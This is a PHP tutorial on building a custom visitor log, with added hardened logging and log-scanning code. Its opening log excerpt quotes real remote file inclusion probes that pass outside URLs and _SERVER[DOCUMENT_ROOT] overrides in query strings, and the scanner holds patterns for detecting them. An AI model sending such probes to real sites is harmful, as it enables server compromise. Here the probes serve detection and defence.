Create Your Own Security Logs
Server log files are your friend. Depending on your server and its settings, your system produces a variety of log files: access, error, SSL, FTP and others. Use them to glean marketing, error-correction and security information for your server and websites. But some administrators do not have access to their server's logs, or they may want to create specific logs that are easily accessible and provide information on the fly. In this tutorial we will show you how to create your own security logs.
First, let’s take a look at some data from an actual log file:
121.165.84.230 - - [17/May/2009:09:09:45 -0500] "GET /product.php?page=http://74.208.173.138:4443/index.html? HTTP/1.1" 302 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
137.118.143.50 - - [17/May/2009:09:14:17 -0500] "GET /product.php?page=http://144.206.186.112:2666/index.html? HTTP/1.1" 302 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
137.118.143.50 - - [17/May/2009:09:33:28 -0500] "GET /product.php?page=http://144.206.186.112:2666/index.html? HTTP/1.1" 302 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
77.56.49.61 - - [17/May/2009:10:09:25 -0500] "GET /product.php?page=http://74.208.173.138:4443/index.html? HTTP/1.1" 302 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
67.15.206.26 - - [17/May/2009:10:59:12 -0500] "GET /product.php?language=4/?_SERVER[DOCUMENT_ROOT]=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 403 955 "-" "libwww-perl/5.65"
67.15.206.26 - - [17/May/2009:10:59:12 -0500] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 403 3985 "-" "libwww-perl/5.65"
203.152.213.84 - - [17/May/2009:11:06:26 -0500] "GET /product.php?language=4/?_SERVER[DOCUMENT_ROOT]=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 403 955 "-" "libwww-perl/5.803"
203.152.213.84 - - [17/May/2009:11:06:26 -0500] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 403 3985 "-" "libwww-perl/5.803"
95.208.88.96 - - [17/May/2009:11:42:49 -0500] "GET /product.php?page=http://74.208.173.138:4443/index.html? HTTP/1.1" 302 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
As you can see, some antisocial miscreants are attempting script injection exploits by passing the URLs of remote websites in the query string (remote file inclusion). As a side note, it is likely that neither the owners of those websites nor those assigned the originating IPs are aware of this malicious use.
What we want to do in this tutorial is use PHP to write certain data to a custom log file.
We want to log the following visitor information: IP address, date/time of visit, method used to access the page, the page accessed, the query used, if any, to access the page and the UNIX timestamp (this is redundant but provides an alternative method for retrieving and storing date/time information).
Terms You Need to Know:
function: a reusable piece of code that is called using a function call. This will be the code we use to write data to a file.
handle: A file pointer. This will point to the file we are using to write and append our log.
fopen: a PHP function used to open files. We will use this function to open our log for appending.
fclose: a PHP function used to close files. We will use this function to close our file when we are through appending data.
fwrite: a PHP function used to write to an open file. We will use this function to write and append our log file.
chmod: a function to change file permissions. We will use this to change our file permissions to 644.
date("Y-m-d H:i:s", time()): PHP functions that format the server's current date and time. We will use them to record the date and time a visitor comes to a webpage.
$_SERVER is an array containing information such as headers, paths, and script locations.
$_SERVER['REMOTE_ADDR']: The IP address from which the user is viewing the current page.
$_SERVER['REQUEST_METHOD']: The request method used to access the page, e.g. 'GET', 'HEAD', 'POST' or 'PUT'.
$_SERVER['PHP_SELF']: The filename of the currently executing script, relative to the document root. This will tell us which page was visited.
$_SERVER['QUERY_STRING']: The query string, if any, via which the page was accessed.
$_SERVER['REQUEST_TIME']: The timestamp of the start of the request. Available since PHP 5.1.0. This returns a UNIX timestamp, showing seconds since the epoch (Jan 1, 1970).
Concatenation Operator: The concatenation operator (.) is used to put two string values together.
The first thing we need to do is create a writable directory to store our log file. For the purpose of this lesson, create a directory called my_log on your web server. If you use this script on a production server we recommend changing the name of this directory. Make the directory writable; for this illustration we will use 777 as our permission settings.
Now we will create a function called create_server_log() and save the file as create_server_log.php. Here is what the script will look like:
<?php
function create_server_log() {
    // Open (or create) the log for appending; mode "a" places every write at the end of the file.
    $handle = fopen("my_log/server_logs.txt", "a");
    // Make the log owner-writable and world-readable (644).
    chmod("my_log/server_logs.txt", 0644);
    // One record per visit: fields separated by a pipe, terminated by a newline.
    $s_remote = $_SERVER['REMOTE_ADDR'] . "|" . date("Y-m-d H:i:s", time()) . "|" . $_SERVER['REQUEST_METHOD'] . "|" . $_SERVER['PHP_SELF'] . "|" . $_SERVER['QUERY_STRING'] . "|" . $_SERVER['REQUEST_TIME'] . "\n";
    fwrite($handle, $s_remote);
    fclose($handle);
}
?>
This script does the following:
First it creates a function called create_server_log():
<?php
function create_server_log() {
Then it creates a file pointer called $handle. This opens our log file server_logs.txt inside the writable directory my_log/ for appending, creating the file if it does not exist yet:
$handle = fopen("my_log/server_logs.txt", "a");
Then it changes the file permissions to 644:
chmod("my_log/server_logs.txt", 0644);
Then we create a variable called $s_remote and use it to contain all the $_SERVER variables we want to grab. We use PHP concatenation (.) to join the $_SERVER variables into one string, separated by a pipe (|) to make the log file easier to read, and finish it off with a new-line "\n" so each visit appends a new line to the log:
$s_remote = $_SERVER['REMOTE_ADDR'] . "|" . date("Y-m-d H:i:s", time()) . "|" . $_SERVER['REQUEST_METHOD'] . "|" . $_SERVER['PHP_SELF'] . "|" . $_SERVER['QUERY_STRING'] . "|" . $_SERVER['REQUEST_TIME'] . "\n";
We then use the fwrite() function to write the data to the log file through the same file pointer:
fwrite($handle, $s_remote);
And finally, we close the file handle and the function:
fclose($handle);
}
Make sure you save the file as create_server_log.php. You can then add this function to any page by using a PHP include and function call. The top of your PHP page would look something like this:
<?php
include("create_server_log.php");
create_server_log();
?>
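The function above works, but it trusts everything it writes. The query string is supplied by the visitor, so a pipe or a newline in it would forge extra fields or whole records in the log, and $_SERVER['PHP_SELF'] can carry visitor-supplied path information. The following hardened variant is an added example, not the tutorial's code. It assumes the same my_log/server_logs.txt path, swaps in $_SERVER['SCRIPT_NAME'] for PHP_SELF, escapes the delimiter and line breaks in every field, checks that fopen() succeeded, and locks the file so concurrent visits do not interleave records. The helper names sanitize_log_field() and build_log_record() are my own.

```php
<?php
// Added example (not the tutorial's code): a hardened create_server_log().
// Assumes the log path my_log/server_logs.txt from the tutorial.

function sanitize_log_field($value) {
    // Escape the backslash first, then the field delimiter and line breaks,
    // so a record is always exactly one line with exactly six fields.
    $value = str_replace(
        array("\\", "\r", "\n", "|"),
        array("\\\\", "\\r", "\\n", "\\|"),
        (string)$value
    );
    // Drop remaining control characters that could confuse a terminal or parser.
    return preg_replace('/[\x00-\x1F\x7F]/', '', $value);
}

function build_log_record(array $server, $now = null) {
    $now = ($now === null) ? time() : $now;
    $fields = array(
        isset($server['REMOTE_ADDR'])    ? $server['REMOTE_ADDR']    : '-',
        date('Y-m-d H:i:s', $now),
        isset($server['REQUEST_METHOD']) ? $server['REQUEST_METHOD'] : '-',
        // SCRIPT_NAME instead of PHP_SELF: it does not include visitor-supplied PATH_INFO.
        isset($server['SCRIPT_NAME'])    ? $server['SCRIPT_NAME']    : '-',
        isset($server['QUERY_STRING'])   ? $server['QUERY_STRING']   : '',
        isset($server['REQUEST_TIME'])   ? $server['REQUEST_TIME']   : $now,
    );
    return implode('|', array_map('sanitize_log_field', $fields)) . "\n";
}

function create_server_log($path = 'my_log/server_logs.txt') {
    $record = build_log_record($_SERVER);
    $fp = fopen($path, 'a');
    if ($fp === false) {
        return false; // could not open the log; do not break the page for the visitor
    }
    // Exclusive lock so two simultaneous requests cannot interleave half-written lines.
    if (flock($fp, LOCK_EX)) {
        fwrite($fp, $record);
        flock($fp, LOCK_UN);
    }
    fclose($fp);
    @chmod($path, 0644);
    return true;
}
?>
```

Because the log lives under the web root, anyone who guesses my_log/server_logs.txt can read it; deny web access to that directory (or move the log outside the document root) so the visitor data you collect does not itself become public.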
A resultant server log created with this function might look something like this:
74.54.108.162|2009-05-17 13:39:47|GET|/create_server_log.php|page=test123|1242585587
74.54.108.162|2009-05-17 13:39:50|GET|/create_server_log.php|page=test123|1242585590
74.54.108.162|2009-05-17 13:45:27|GET|/create_server_log.php|page=test123|1242585927
74.54.108.162|2009-05-17 13:56:15|GET|/create_server_log.php|page=test123|1242586575
74.54.108.162|2009-05-17 13:56:34|GET|/create_server_log.php|page=test123|1242586594
74.54.108.162|2009-05-17 13:56:38|GET|/create_server_log.php|page=test123|1242586598
74.54.108.162|2009-05-17 13:56:40|GET|/create_server_log.php|page=test123|1242586600
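Once the log exists, the point of keeping it is to read it. The script below is an added example, not part of the tutorial: it parses the pipe-delimited records create_server_log() writes and flags the two request shapes seen in the Apache excerpt at the top of the page, a parameter whose value is a remote URL and a query that tries to set $_SERVER[...] keys. The sample records are constructed for the example (the remote hosts use documentation addresses) and the function names parse_log_line(), classify_query() and scan_server_log() are my own.

```php
<?php
// Added example (not the tutorial's code): scan the custom log for the
// request patterns shown in the tutorial's Apache excerpt.

function parse_log_line($line) {
    // Six fields: ip|date time|method|page|query|unix timestamp
    $parts = explode('|', rtrim($line, "\r\n"), 6);
    if (count($parts) !== 6) {
        return null; // malformed or truncated record
    }
    return array(
        'ip'     => $parts[0],
        'time'   => $parts[1],
        'method' => $parts[2],
        'page'   => $parts[3],
        'query'  => $parts[4],
        'ts'     => (int)$parts[5],
    );
}

function classify_query($query) {
    $query = urldecode($query);
    // Attempts to set $_SERVER keys (register_globals style) via the query string.
    if (stripos($query, '_SERVER[') !== false || stripos($query, 'DOCUMENT_ROOT') !== false) {
        return 'server-variable-override';
    }
    // A parameter whose value is a URL on another host (remote file inclusion probe).
    if (preg_match('#=\s*(https?|ftp)://#i', $query)) {
        return 'remote-url-in-parameter';
    }
    return null;
}

function scan_server_log($lines) {
    $hits = array();
    foreach ($lines as $line) {
        $rec = parse_log_line($line);
        if ($rec === null) {
            continue;
        }
        $tag = classify_query($rec['query']);
        if ($tag === null) {
            continue;
        }
        if (!isset($hits[$rec['ip']])) {
            $hits[$rec['ip']] = array();
        }
        $hits[$rec['ip']][] = array('tag' => $tag, 'time' => $rec['time'], 'page' => $rec['page']);
    }
    return $hits;
}

// Constructed sample records in the tutorial's log format; remote hosts use
// documentation addresses (203.0.113.0/24), so nothing here points at a real site.
$sample = array(
    "74.54.108.162|2009-05-17 13:39:47|GET|/product.php|page=test123|1242585587",
    "121.165.84.230|2009-05-17 09:09:45|GET|/product.php|page=http://203.0.113.10:4443/index.html?|1242569385",
    "67.15.206.26|2009-05-17 10:59:12|GET|/product.php|language=4/?_SERVER[DOCUMENT_ROOT]=http://203.0.113.20/ec.txt?|1242575952",
    "broken line without enough fields",
);

foreach (scan_server_log($sample) as $ip => $events) {
    foreach ($events as $e) {
        echo "{$ip} {$e['time']} {$e['page']} {$e['tag']}\n";
    }
}
?>
```

Run it against the real file with scan_server_log(file('my_log/server_logs.txt')). The benign test123 record and the malformed line produce no output; the other two are reported under their source IP, which is the list you would feed into a firewall deny rule or a review of what /product.php does with its page parameter.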
This is the end of the tutorial: Create Your Own Security Logs. We hope you learned something new.
If you have questions or comments we would appreciate your feedback.